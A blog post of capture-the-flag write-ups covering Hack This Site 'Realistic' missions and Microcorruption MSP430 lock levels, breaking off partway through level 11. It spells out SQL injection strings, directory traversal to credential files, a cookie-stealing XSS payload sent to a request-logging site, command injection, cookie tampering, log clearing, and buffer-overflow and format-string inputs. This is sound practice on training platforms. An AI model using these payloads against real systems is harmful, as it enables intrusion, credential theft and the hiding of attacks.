tuonilabs

Hack This Site Realistic Write-Up

What follows is a write-up of a web security war game, Hack This Site – Realistic.

Players are given a set of requests they must fulfill in order to beat every challenge. Doing so entails using a variety of offensive security tools, crafting up code, and learning throughout the process.

Players must have a good understanding of web vulnerabilities in order to successfully complete the challenges.

[*] Status: COMPLETED
[*] Note: I am currently updating this blog post to include screenshots.

Uncle Arnold’s Local Band Review

Goal:

Solution:

Voting for “Raging Inferno”:
Open Burp Suite’s Proxy with Intercept On
Set the Ranging Inferno’s vote count to 5, and click on “vote!”

Manipulating the votes to have “Raging Inferno” come out on top:
In the intercepted request, change the vote count to an incredibly high number.
Forward

Success:

Technique used: Parameter manipulation

Chicago American Nazi Party

Goal:

Solution:

Checking the source code:
Right-click -> View Page Source

Notice the hidden “update.php” page.

Browsing to the newly discovered page:

Bypassing authentication via SQL injection:
Enter username ” ‘ or 1=1– ” and click on “Submit Query”.

Success:

Technique used: SQL injection

Peace Poetry: HACKED

Goal:

Solution:

Checking the source code:
Right-click -> View Page Source

Notice that we can browse to the original website.

Browsing to the original website “oldindex.html”:

Copying the source code:
Right-click -> View Page Source -> Ctrl-A -> Ctrl-C

Fixing the website:
Click on “Submit Poetry”
Set the name of the poem to: ../index.html
Paste the original source code in the “Poem” box and click on “add poem”.

Success:

Technique used: Directory traversal; remote code execution

Fischer’s Animal Products

Goal:

Solution:

Testing for SQL injection:

Result:

Testing for SQL injection via the URL:
Click on “Alligator Accessories”
In the URL bar, add a space, and add the following: UNION ALL SELECT null, *, null, null FROM email;

Full URL: https://www.hackthissite.org/missions/realistic/4/products.php?category=2 UNION ALL SELECT null, *, null, null FROM email;

Result:

What UNION does is join queries, and so the results of additional (malicious) queries are joined with the results of the original query. This allows for the extraction of data within columns of other tables.

Sending the email addresses to the client:
Copy the list of e-mails -> Go to your Hack This Site Profile -> Click on your username

Success:

Techniques Used: SQL injection using UNION

Damn Telemarketers!

Goal:

Solution:

Check the “robots.txt” file:

Browse to the “secret” directory:

Click on “admin.bak.php”:

Cracking the hash:
Browse to: https://crackstation.net/
Enter the hash and submit

Password: 583bc

Visiting the “Database” page accessible by the main page:
Enter the password: 583bc

Success:

Techniques Used: Inspecting “robots.txt” file; hash cracking

ToxiCo Industrial Chemicals

Goal:

Solution:

Search for “xecryption” via your favorite search engine:

Proof of concept program: http://telmo.pt/xecryption/

Whether or not intended as the solution, it is important to recognize the value of searching for solutions instead of trying to reinvent the wheel. Of course, that is in terms of efficiency. For fun’s sake, do try indeed.

Results of decrypting the ciphertext via Telmo:

Sending the decrypted message to ToxiCo_Watch:
Copy the decrypted message
Browse to: https://www.hackthissite.org/pages/messages/msys/send.php
Paste and send the message

Success:

Techniques Used: Use of Proof of Concept decryption script

What’s Right For America

Goal:

Solution:

Checking the source code:
Right-click -> View Page Source

Notice the directory structure. Browsing to images might reveal other directories.

Checking for other directories:
Browse to: https://www.hackthissite.org/missions/realistic/7/images/

Bingo. Notice the admin directory.

Checking the admin directory:

We are going to have to find the password somehow.

Searching for the password:
Back in the main page, click on “Patriotism”.
Notice the URL structure: showimages.php?file=patriot.txt

This may allow for directory traversal. All we have to do is access the correct password path.
We will try grabbing “htpasswd”, the file that Apache uses for authentication.

Grabbing the password:
Modify the URL: showimages.php?file=images/admin/.htpasswd
Right-click -> View Page Source

Cracking the password hash:
Copy and paste the password hash into a file, such as “htpasswd”
john htpasswd

Username: administrator
Password: shadow

Logging into the administrator page:
Browse back to: https://www.hackthissite.org/missions/realistic/7/images/admin/

Success:

Techniques used: Directory traversal; hash cracking

United Banks Of America

Goal:

Solution:

Searching for Gary Hunter’s username:
Click on “User Info”
Enter as user: ‘ or 1=1–

Jackpot. We have Gary’s credentials.

Register as a user:
Click on “Register”
Enter random credentials

Logging in as our newly created user:

Impersonating Gary:
Open Cookies Manager+
Search for “hackthissite” cookies
Edit the “accountUsername” cookie value and set it to: GaryWilliamHunter

Transferring the money:
Set the user to send the money to as “dropCash” and the amount to: 10000000
Click on “Move Money To A Different Account”

Clearing the logs:
Log in again
Open Burp Suite’s Proxy with Intercept On
Click on “Clear Files In Personal Folder”
Change the “dir” parameter value to: logFiles
Forward

Success:

Techniques used: SQL injection; session hijacking; parameter manipulation; local file inclusion

CrappySoft Software

Goal:

Solution:

Log in with the supplied credentials:

Create a private RequestBin:
Browse to http://requestb.in and create a private RequestBin

Perform Cross-Site Scripting (XSS) via private messages:
Click on “[Private Message]”
Send a XSS payload to the boss, m-crap (owner)

Payload:
<iframe frameborder=0 height=0 width=0 src=javascript:void(window.location=”http://requestb.in/1mep2ns1?c=” + document.cookie)</iframe>

Result:

The challenge assumed we wouldn’t be able to get the cookie back. However, the method shown above is valid.

Set the cookies to the admin values:
Open Cookies Manager+

Transferring the money:
Click on “[Pay Salaries]”
Pay r-conner

Cleaning the logs:
Click on “[Mailing List]”
Right-click -> Inspect Element -> Change the ‘strFileName’ value to: ./files/logs/logs.txt
Click on “Subscribe!”

Success:

Techniques used: Cross-Site Scripting (XSS); local file inclusion

Holy Word High School

Goal:

Solution:

Checking the source code:
Right-click -> View Page Source

Notice the hidden “staff.php” page.

Logging in as Zach:
Click on “Student Access System”
Log in with the supplied credentials.

Gaining teacher credentials:
Click on “Staff Listing”
Go back to the “staff.php” page
Log in as smiller:smiller

We are going to have to bypass the crappy protection.

Bypassing the limitations:
Open User Agent Switcher -> Edit User Agents -> New -> New User Agent -> Add “holy_teacher” -> Ok
Open Cookies Manager+ -> Search for ‘admin’ -> Change Content to: 1
Refresh the page

Changing Zach’s grades:
Click on “Change Grades”
Click on “Zach Sanchez”
Right-click -> View Page Source Code
Browse to: https://www.hackthissite.org/missions/realistic/10/staff.php?action=changegrades&changeaction=modrec&rec=4&studentid=1&grade=5
Browse to: https://www.hackthissite.org/missions/realistic/10/staff.php?action=changegrades&changeaction=modrec&rec=0&studentid=1&grade=5
Browse to: https://www.hackthissite.org/missions/realistic/10/staff.php?action=changegrades&changeaction=modrec&rec=3&studentid=1&grade=5

The modifications were possible due to the URL parameter inclusion and the HTTP POST method being utilized.

Success:

Techniques used: User-Agent manipulation; Parameter manipulation; HTTP POST request abuse

BudgetServ Web Hosting

Goal:

Solution:

Inspecting the website functionality:
Click on “WebMail”
Notice the URL structure: https://www.hackthissite.org/missions/realistic/11/page.pl?page=email

Testing for directory traversal or command injection:
In the URL: https://www.hackthissite.org/missions/realistic/11/page.pl?page=stuff

We may be able to get a listing of all directories.

Listing all directories:
In the URL: https://www.hackthissite.org/missions/realistic/11/page.pl?page=|ls|

Browsing to the “client_http_docs” directory:

Browsing to “therightwayradio” and inspecting the source code:

Manipulating user information:
Browse to: https://www.hackthissite.org/missions/realistic/11/client_http_docs/therightwayradio/?page=userinfo
Notice there’s a user whose information we can change
Change the password to: coconuts
Click on “edit account”

Log in as “aclu_bomber_08290”:

Changing SQL databases:
Click on “mod”
Right-click on the input field and select “Inspect Element”
Change the “sql_db” value from “rwr.dbase” to: ../../../bs.dbase

Extract database information:
SELECT * FROM sqlite_master -> sql query

Extract admin credentials:
SELECT * FROM web_hosting -> sql query

Navigate to the admin page in WebServ and enter the credentials:
URL: https://www.hackthissite.org/missions/realistic/11/admin/

Checking the source code:
Right-click -> View Page Source

Downloading the desired file:
URL: https://www.hackthissite.org/missions/realistic/11/admin/d.pl?file=/var/www/budgetserv/html/client_http_docs/space46/src.tar.gz

Success:

Techniques used: Command injection; directory traversal

Heartland School District

Goal:

Solution:

Learning more about Windows 95:
Search for: windows 95 server path

This result leads us to believe we can specify whether we’re accessing a web page (via the http prefix) or a local file.

Mapping the drive:
In the address bar: file:\\C:\\
Go

Success. We can access local files via the address box.

Accessing web resources:
In the address bar: file:\\C:\\WEB\
Go

Investigating HTML files:
In the address bar: file:\\C:\\WEB\HTML
Go

Notice the admin panel. Let us visit it and try to break in.

Exploring the admin panel:

We are going to have to find the password somehow.

Finding a way to get the admin password:
Back in the main page, click on “Student Work”
Click on “Joey Simons”

Notice there’s some additional functionality in this page, via “Sign my guestook”.

Discovering another way to access files:
Click on “Sign my guestook”.
Right-click on the input box -> Inspect Element

Notice the new “guest.pl” file which has “write” permissions. If it has Write permissions, it very likely also has Read permissions. This may be a way to grab the admin’s password.

Grabbing the admin’s password:
Browse to: https://www.hackthissite.org/missions/realistic/12/cgi-bin/guest.pl?action=read&file=heartlandadminpanel.pl
Right-click -> View Page Source

Score.

Username: jbardus
Password: heartlandnetworkadministrator

Logging in as JBardus:

Completing the mission:
Click on “clear all”

Success:

Techniques used: Directory traversal; local file inclusion

Elbonian Republican Party

Goal:

Solution:

Understanding the website:
Click on “Press Releases”
Right-click -> View Page Source
Click on “readpress.php”

From the “readpress.php” we discover many facts:
1) The machine runs MySQL
2) The service is Apache
3) The machine runs Windows
4) We can access hidden data by obtaining the hex digest of the string “Speeches”

Obtaining the hex digest of “Speeches”:
python -c ‘import hashlib; print hashlib.md5(“Speeches”).hexdigest()’

Hex digest: 7e40c181f9221f9c613adf8bb8136ea8

Accessing restricted data:
Browse to: https://www.hackthissite.org/missions/realistic/13/speeches/passwords/7e40c181f9221f9c613adf8bb8136ea8/

Obtaining the password:
Click on “passwords.fip”
Browse to: https://crackstation.net/
Enter the hashes, one per line

User: moni1
Pass: admin

Accessing the admin panel:
Browse to: https://www.hackthissite.org/missions/realistic/13/admin/
Enter the credentials found earlier

Strange. However, remember how the paths were hashed. Let’s try accessing the admin page again, but with a hash instead.

Browse to: https://www.hackthissite.org/missions/realistic/13/21232f297a57a5a743894a0e4a801fc3/
Enter the cracked credentials

Success:

Techniques used: Source code review; directory traversal; hash/password cracking

Yuppers Internet Solutions

Goal:

Solution:

Checking the source code:
Click on “News”
Right-click -> View Page Source

Notice the URL structure. We may be able to manipulate the database via the URL.

Testing for SQL injection:
In the URL: https://www.hackthissite.org/missions/realistic/14/news.cgi?news=’

Notice that the search works by using our query and appending “.news” to it.
We can try bypassing this concatenation by using null bytes (%00).

Further testing the SQL injection theory:
In the URL: https://www.hackthissite.org/missions/realistic/14/news.cgi?story=.%00

Success. The website is vulnerable to SQL injections.
Notice the “moderator.cgi” file, which seems particularly interesting.

Checking the “moderator.cgi” file:
In the URL: https://www.hackthissite.org/missions/realistic/14/news.cgi?story=moderator.cgi%00

If we have the program believe that we are admin by providing the “isadmin” parameter, we can bypass security measures.

Browsing to the “moderator.cgi” file and providing “isadmin”:

Great success.

Getting a list of users:
View Account Info: *

We now have the admin credentials, webguy:reallyreallylongpasswordthatisveryveryveryhardtoguessorcrack
We can now attempt to log in as an admin.

Logging in as admin:
Browse to: https://www.hackthissite.org/missions/realistic/14/login
Enter the credentials found earlier

Completing the mission:
Click on “Administrator Panel”

Techniques used: SQL injection using null bytes

seculas Ltd.

Goal:

Solution:

Checking the source code:
Click on “News”
Right-click -> View Page Source

Notice the admin information. This could be useful later.

Checking for vulnerabilities within the pages:
Click on “Jobs”
Click on “Send your application”
Click on “Send”
Right-click -> View Page Source

Notice there’s a backup directory.

Browsing to the backups directory:
URL: https://www.hackthissite.org/missions/realistic/15/_backups_/

Checking the “backup.zip” file:
Download the file
Open it

Notice the files are password-protected.

Since the password cannot be found online, we can use PkCrack to crack the files.
PkCrack can help us break open the file via a “known plaintext attack”, which basically means we need to know part of the encrypted data in order to break the cipher.

Luckily for us, the ZIP file contains “index.htm”, which we have access to.

Using PkCrack and the “index.htm” file to break open the passowrd-protected ZIP file:
Browse to: https://www.hackthissite.org/missions/realistic/15/index.htm
Right-click -> Save Page As -> index.htm -> Web Page, HTML only
Compress the ‘index.htm’ using Winace
pkcrack -c “misc (files from different folders)/index.htm” -p index.htm -C backup.zip -P index.zip -d decracked.zip -*
Open the “decracked.zip” file -> Internal messages -> msgauth.php

Take note of the variable names. These might be useful when bypassing authentication.

misc (files from different folders) -> shell.php

Notice the variable names and the (unlimited) directory limit.

Creating an HTML file to log in as Susy:

Logging in as Susy:
Double-click on the HTML file we just created.
Click on “send”

Browse to: https://www.hackthissite.org/missions/realistic/15/internal_messages/internal_messages.php
Enter Susy’s credentials and click on “read messages”

Following the admin_area lead:
Browse to: https://www.hackthissite.org/missions/realistic/15/admin_area/

Browse to: http://www.hackthissite.org/missions/realistic/15/admin_area/shell.php

Click Ok

Click “Cancel”

Notice the hash.
Let’s try to crack it using CrackStation.

Cracking the hash:

Password: foobar

Accessing the shell page:
Browse back to: http://www.hackthissite.org/missions/realistic/15/admin_area/shell.php
User Name: root
Password: foobar

Using the shell to list directory contents:
ls

Voila. Notice the “viewpatents” files. These are what we want.

Following on the patent lead:
Browse to: https://www.hackthissite.org/missions/realistic/15/admin_area/viewpatents.php

We get another login form. Time to look for the credentials.

Looking for the credentials to unlock patents:
Browse to: https://www.hackthissite.org/missions/realistic/15/admin_area/test/

Excellent. Looks like we found the credentials.

Checking the “chkuserpass.c.zip” file:
Download the file and unzip it
Open the chkuserpass.c file

Looks like we are going to perform a good ol’ buffer overflow to bypass authentication.
Notice that all we need to have in order to bypass authentication is “is_pass_correct” set to ‘Y’.

Performing a buffer overflow on the username field:
python -c ‘print “Y” * 230’
Copy the output and paste it in the username field
Click on “OK”

Success:

Techniques used: Known plaintext attack; hash cracking; buffer overflow

Simple Mail

Goal:

Solution:

Checking the source code:
Click on “News”
Right-click -> View Page Source

Notice the URL structure, and also the admin login page.

Accessing the admin login page:
Browse to: https://www.hackthissite.org/missions/realistic/16/index.php?module=admin_login

Open Burp Suite’s Proxy with Intercept On
Click on “Login”

Notice the requests to these two files. These might be useful in the future.
For now, we will register a new user to see what else we can do.

Register as a new user:
Browse over “Members” -> Click on “Register”

Inspect member functionality:
Log in as the newly created user
Click on “User Panel” -> “Edit My Profile”
Right-click -> View Page Source
Click on “edit.php”

Notice how the configurations are saved.
We are in control of the username parameter, which means we may be able to perform directory traversal by choosing a special username.

Creating a malicious user:
Click on “Members” -> “Logout”
Click on “Members” -> “Register”

Carrying out the attack:
Log in as the newly created user
Click on “User Panel” -> “Edit My Profile”
Personal Message: auth_page=config.txt&authed=true&

Confirming attack was successful:
Browse to: https://www.hackthissite.org/missions/realistic/16/config.txt

Log in via the admin panel:
Browse to: https://www.hackthissite.org/missions/realistic/16/index.php?module=admin_login

Reviewing Jenn’s email:

Right-clicking on the input field shows that this is a Flash application.
This means we could download it and reverse engineer it.

Downloading the Flash file:
Right-click -> View Page Source

Analyzing the Flash file:
flasm -d check_email.swf

We simply have to navigate to that path and add Jenn’s email at the end.

Checking Jenn’s emails:
Browse to: https://www.hackthissite.org/missions/realistic/16/check_email.php?auth=true&id=63a4bf12cd&email=jenn@simplemail.com

Techniques used: Local file inclusion; directory traversal; client-side control bypass via Flash reverse engineering

Microcorruption Write-Up

What follows is a write-up of an embedded security capture the flag (CTF), Microcorruption.

The CTF has security researchers try their hands against a TI MSP430 microcontroller.

Players are given a debugger and a device, and they have to find the input that unlocks the device. Every level gets progressively harder and include techniques such as address space layout randomization (ASLR), data execution prevention (DEP), and alphanumeric limitations.

[*] Status: COMPLETED

Level 1: New Orleans

OVERVIEW

– This is the first LockIT Pro Lock.
– This lock is not attached to any hardware security module.

DETAILS

The LockIT Pro a.01 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

There is no default password on the LockIT Pro—upon receiving
the LockIT Pro, a new password must be set by connecting it to the
LockIT Pro App and entering a password when prompted, and then
restarting the LockIT Pro using the red button on the back.

This is Hardware Version A. It contains the Bluetooth connector
built in, and one available port to which the LockIT Pro Deadbolt
should be connected.

Solution:

Break main and type “continue”.

Investigate the create_password function.

Notice “create_password” creates the correct password at address 0x2400.

Type ‘c’ (continue) and then press “Wait”.

Notice in the live memory dump that the correct password is in address 0x2400.

Password: fVk*s!!

Type “solve” and enter the password.

Level 2: Sydney

OVERVIEW

– We have revised the software in revision 02.
– This lock is not attached to any hardware security module.

DETAILS

The LockIT Pro a.02 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

This is Hardware Version A. It contains the Bluetooth connector
built in, and one available port to which the LockIT Pro Deadbolt
should be connected.

This is Software Revision 02. We have received reports that the
prior version of the lock was bypassable without knowing the
password. We have fixed this and removed the password from memory.

Solution:
Break main and type “c”.

Investigate the check_password function.

Notice “check_password” reads our input sequentially and compares it.

Taking into account that the machine deals in 16-bit little endian, the comparisons translate to:
0x3c72    = r<
0x515b    = [Q
0x582d    = -X
0x4f69    = iO

Password: r<[Q-XiO

Type “reset”, “solve”, and enter the password.

Level 3: Hanoi

OVERVIEW

– This lock is attached the the LockIT Pro HSM-1.
– We have updated the lock firmware to connect with the hardware
security module.

DETAILS

The LockIT Pro b.01 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

There is no default password on the LockIT Pro HSM-1. Upon
receiving the LockIT Pro, a new password must be set by first
connecting the LockitPRO HSM to output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware Security Module 1 stores the login password,
ensuring users can not access the password through other means.
The LockIT Pro can send the LockIT Pro HSM-1 a password, and the
HSM will return if the password is correct by setting a flag in
memory.

This is Hardware Version B. It contains the Bluetooth connector
built in, and two available ports: the LockIT Pro Deadbolt should
be connected to port 1, and the LockIT Pro HSM-1 should be
connected to port 2.

Solution:
Break main and type “c”.

Investigate the “login” function.

Notice at address 0x455a that there is a comparison instruction: cmp.b #0x40, &0x2410

0x40 = @

Type ‘c’, input: aaaabbbb, and send.

Notice in the live memory dump that our input starts at address 0x2400.

We can now calculate the offset to bypass the password authentication:
2410 – 2400 = 16

Testing our calculations:
python -c “print ‘a’ * 16 + ‘@'”
reset
c
c
Input: aaaaaaaaaaaaaaaa@
Send
c

String that allows bypass: aaaaaaaaaaaaaaaa@

Type “solve”, input the “password” and send.

Level 4: Reykjavik

OVERVIEW

– Lockitall developers have implemented military-grade on-device
encryption to keep the password secure.
– This lock is not attached to any hardware security module.

DETAILS

The LockIT Pro a.03 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

This is Hardware Version A. It contains the Bluetooth connector
built in, and one available port to which the LockIT Pro Deadbolt
should be connected.

This is Software Revision 02. This release contains military-grade
encryption so users can be confident that the passwords they enter
can not be read from memory. We apologize for making it too easy
for the password to be recovered on prior versions. The engineers
responsible have been sacked.

Solution:
Break main and type “c”.

Note the call to 0x2400

Break 2400 and type “c”.

Type “read 2400 180”.

Copy the output and paste it into a file “reykjavik.txt”.

Run “get_instructions.py”:
python get_instructions.py

Copy the output, open the Assembler in a new tab, paste the output and click on “Disassemble”.

Note the following instruction:
cmp #0x869d, -0x24(r4)

Type “c” and input “aaaa”.

Notice the register state:

As per the instruction: cmp #0x869d, -0x24(r4)
-0x24(r4) = 0x43fe – 0x24 = 0x43da

Looking at the live memory dump, we can see that 0x43da is the start of our input.
This means the instruction is comparing our input to 0x869d

Password (hex-encoded input): 9d86

Type “reset”, “solve”, and enter the password.

Level 5: Cusco

OVERVIEW

– We have fixed issues with passwords which may be too long.
– This lock is attached the the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.02 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communicate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessible from the exterior of the building.

This is Software Revision 02. We have improved the security of the
lock by removing a conditional flag that could accidentally get
set by passwords that were too long.

Solution:
Break main and type “c”.

We will break at login’s ret address.

Break 453e and type “c”.
python -c “print ’41’ * 20”

Input (hex-encoded): 4141414141414141414141414141414141414141
send
c

Type “read sp 8”.

Notice that our input starts at 0x43ee and the stack pointer is at 0x43fe
python -c “print 0x43fe – 0x43ee”

The result is 16.

We will aim to perform a buffer overflow.

unlock_door starts at 4446.
With the information we have we can now bypass authentication by perform a buffer overflow.

Performing the buffer overflow:
python -c “print ’41’ * 16 + ‘4644’”

Password (hex encoded input): 414141414141414141414141414141414644

Type “reset”, “solve”, and enter the password.

Level 6: Whitehorse

OVERVIEW

– This lock is attached the the LockIT Pro HSM-2.
– We have updated the lock firmware to connect with this hardware
security module.

DETAILS

The LockIT Pro c.01 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

There is no default password on the LockIT Pro HSM-2. Upon
receiving the LockIT Pro, a new password must be set by first
connecting the LockitPRO HSM to output port two, connecting it to
the LockIT Pro App, and entering a new password when prompted, and
then restarting the LockIT Pro using the red button on the back.

LockIT Pro Hardware Security Module 2 stores the login password,
ensuring users can not access the password through other means.
The LockIT Pro can send the LockIT Pro HSM-2 a password, and the
HSM will directly send the correct unlock message to the LockIT
Pro Deadbolt if the password is correct, otherwise no action is
taken.

This is Hardware Version C. It contains the Bluetooth connector
built in, and two available ports: the LockIT Pro Deadbolt should
be connected to port 1, and the LockIT Pro HSM-2 should be
connected to port 2.

This is Software Revision 01. The firmware has been updated to
connect with the new hardware security module. We have removed the
function to unlock the door from the LockIT Pro firmware.

Solution:
Break main and type “c”.

Break 4514 and type “c”.

Break 452e and type “c”.
python -c “print ’41’ * 20”

Input (hex-encoded): 4141414141414141414141414141414141414141
Send
c

Type “read sp 8”.

Notice our input starts at 0x3600 and the stack pointer is at 0x3610
This means the offset is 16

We will aim to perform a buffer overflow by using the interrupt called by conditional_unlock_door.

Looking at the manual, we can see that INT 0x7f is just what we need.

This interrupt is at 4460.

Performing the buffer overflow:
python -c “print ’41’ * 16 + ‘60447f'”

Password (hex encoded input): 4141414141414141414141414141414160447f

Type “reset”, “solve”, and enter the password.

Level 7: Montevideo

OVERVIEW

– Lockitall developers have rewritten the code to conform to the
internal secure development process.
– This lock is attached the the LockIT Pro HSM-2.

DETAILS

The LockIT Pro c.03 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

This is Software Revision 03. We have received unconfirmed reports
of issues with the previous series of locks. We have reimplemented
much of the code according to our internal Secure Development
Process.

Solution:
Break main and type “c”.

Notice that Montevideo looks very similar to Whitehorse.
We will try the same solution.

Trying the Whitehorse solution:
c

Input (hex-encoded): 4141414141414141414141414141414160447f
c

The same solutions works!

Type “reset”, “solve”, and enter the password.

Level 8: Johannesburg

OVERVIEW

– A firmware update rejects passwords which are too long.
– This lock is attached the the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.04 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

This is Software Revision 04. We have improved the security of the
lock by ensuring passwords that are too long will be rejected.

Solution:
Break main and type “c”.

Notice 0x4578 in login has cmp.b #0x18, 0x11(sp)

Break 4590 and type “c” twice.
python -c “print ’41’ * 16”

Input (hex-encoded): 41414141414141414141414141414141
Send
c

Notice that there is an 18, 18 bytes after our input.
This 18 acts as a stack canary.
Stack canaries are basically integers that are placed just before the stack pointer. Similar to canaries in a coal mine, if the integer gets overwritten, the program knows that there was a buffer overflow attempt.

Notice that unlock_door starts at address 4446.

Performing the buffer overflow:
python -c “print ’41’ * 17 + ’18’ + ‘4644’”

Password (hex encoded input): 4141414141414141414141414141414141184644

Type “reset”, “solve”, and enter the password.

Level 9: Addis Adaba

OVERVIEW

– We have verified passwords can not be too long.
– Usernames are printed back to the user for verification.
– This lock is attached the the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.03 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

This is Software Revision 03. We have improved the security of the
lock by ensuring passwords can not be too long.

Solution:
Break main and type “c”.

Notice the use of “printf”. This means that format string vulnerabilities could be one vector of attack.

Break at the tst instruction (448a) and type “c”.

At the input prompt don’t type anything and type “c”.

Notice that the address being tested is 0x3c50
This means we have to write a number to that address in order to skip the jz instruction and call unlock_door.

Testing the format string theory:
reset
c
c

Input: 503c%i%n

A format string attack is possible.
The %n parameter will write the number of characters to 0x503c, hence giving us the non-zero number.
In this case, the %n will write a 2.

Confirming our attack:
reset
c
c

Input: 503c2569256e

Our attack works. Time to solve the challenge.

Password (hex encoded input): 503c2569256e

Type “reset”, “solve”, and enter the password.

Level 10: Santa Cruz

OVERVIEW

– A firmware update further rejects passwords which are too long.
– This lock is attached the the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.05 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

This is Software Revision 05. We have added further mechanisms to
verify that passwords which are too long will be rejected.

Solution:
Break main and type “c”.

Notice the address of unlock_door is 0x444a

Type “c” enter a username and password and type “c” again.

Notice the following addresses:
user is at 0x43a2
password at 0x43b5
stack pointer is at 0x43a0
ret address at 0x43cc

Inspect the login function:
Notice the mov.b -0x18(r4), r15 at login’s 0x45e4

Type “read r4-18”:

The resulting address is 0x43b4 and it has a value of 0x10
Notice the mov.b -0x19(r4), r15 at login’s 0x45fa

Type “read r4-19”:

The resulting address is 0x43b3 and it has a value of 0x08
Notice the tst.b -0x6(r4) at login’s 0x464c and the jz #0x465e <login+0x10e> at login’s 0x4650

Type “read r4-6”:

The resulting address is 0x43c6, meaning 0x43c6 must be 0x0
We want to overwrite the ret address with that of unlock_door
We also want to make sure that the value of 0x43b3 is lower than our password length and 0x43b4 is higher than our password length

Use Python to make calculations:
python -c “print 0x43cc – 0x43a2”
The result is 42

python -c “print (’61’ * 17) + ’01’ + (’61’ * 24) + ‘4a44′”
The result will be our username

We want to overwrite the 0x43c6 address with 0x0
python -c “print 0x43c6 – 0x43b5”
The result is 17

python -c “print ’62’ * 17 + ’00′”
The result will be our password

Testing the theory:
reset
c
c
user (hex-encoded): 6161616161616161616161616161616161016161616161616161616161616161616161616161616161614a44
c
pass (hex-encoded): 626262626262626262626262626262626200
c

We have our solution and are ready to pass the challenge.

Username (Hex encoded input): 6161616161616161616161616161616161016161616161616161616161616161616161616161616161614a44
Password (Hex encoded input): 626262626262626262626262626262626200

Type “reset”, “solve”, and enter the password.

Level 11: Jakarta

OVERVIEW

– A firmware update further rejects passwords which are too long.
– This lock is attached the the LockIT Pro HSM-1.

DETAILS

The LockIT Pro b.06 is the first of a new series of locks. It is
controlled by a MSP430 microcontroller, and is the most advanced
MCU-controlled lock available on the market. The MSP430 is a very
low-power device which allows the LockIT Pro to run in almost any
environment.

The LockIT Pro contains a Bluetooth chip allowing it to
communiciate with the LockIT Pro App, allowing the LockIT Pro to
be inaccessable from the exterior of the building.

This is Software Revision 06. We have added further mechanisms to
verify that passwords which are too long will be rejected.

Solution:

Break main and type “c”.

Notice unlock_door is at 0x444c
We will use the interrupt at 4450 to unlock the door.

Notice the cmp.b #0x21, r11 in login’s 0x45ae
This checks for the username meeting the 0x20 limit

Notice the add r11, r15 at 0x45fe and the cmp.b #0x21, r15 at 0x4600
These check for the combined length of user and pass against 0xff

Type “c” and use Python to calculate the username:
c
python -c “print ’61’ * 32”
Input (hex-encoded): 6161616161616161616161616161616161616161616161616161616161616161

Type “c” and use Python to calculate the password:
c
python -c “print ’61’ * 4 + ‘4c44′ + ’62’ * 218”
Input: 616161614c446262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262626262

Type “c” twice:
c
c

We have our solution and can now pass the challenge.

Username (Hex encoded input): 6161616161616161616161616161616161616161616161616161616161616161

